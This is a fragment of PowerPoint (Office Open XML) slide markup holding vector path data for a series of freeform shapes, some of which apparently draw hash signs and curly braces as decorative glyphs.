                  <a:gd name="T1" fmla="*/ 0 h 3"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 2"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 0 w 2"/>
                  <a:gd name="T7" fmla="*/ 1 h 3"/>
                  <a:gd name="T8" fmla="*/ 2 w 2"/>
                  <a:gd name="T9" fmla="*/ 0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1"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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Freeform 338"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="1518"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3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Freeform 339"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 340"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 341"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 342"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 343"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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Freeform 344"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 345"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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Freeform 346"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="1833"/>
                <a:ext cx="155"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Freeform 347"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 348"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 349"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 350"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 351"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 352"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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2"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Freeform 353"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="1838"/>
                <a:ext cx="187" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 219"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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19">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 354"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 355"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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Freeform 356"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="1833"/>
                <a:ext cx="154"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Freeform 357"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 358"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563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Freeform 359"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828"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Freeform 360"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 361"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172"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Freeform 362"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="1838"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 62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59 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 122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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 363"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 364"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769"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Freeform 365"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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Freeform 366"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114"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Freeform 367"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312"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Freeform 368"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="1838"/>
                <a:ext cx="76"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7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7"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369"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="1838"/>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5 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 41 w 63"/>
                  <a:gd name="T31" fmla="*/ 83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8" y="129"/>
                      <a:pt x="41" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="27"/>
                      <a:pt x="14" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="101"/>
                      <a:pt x="48"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Freeform 370"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669"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Freeform 371"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="182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4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5"/>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9"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>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3"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33"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9" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="159" y="146"/>
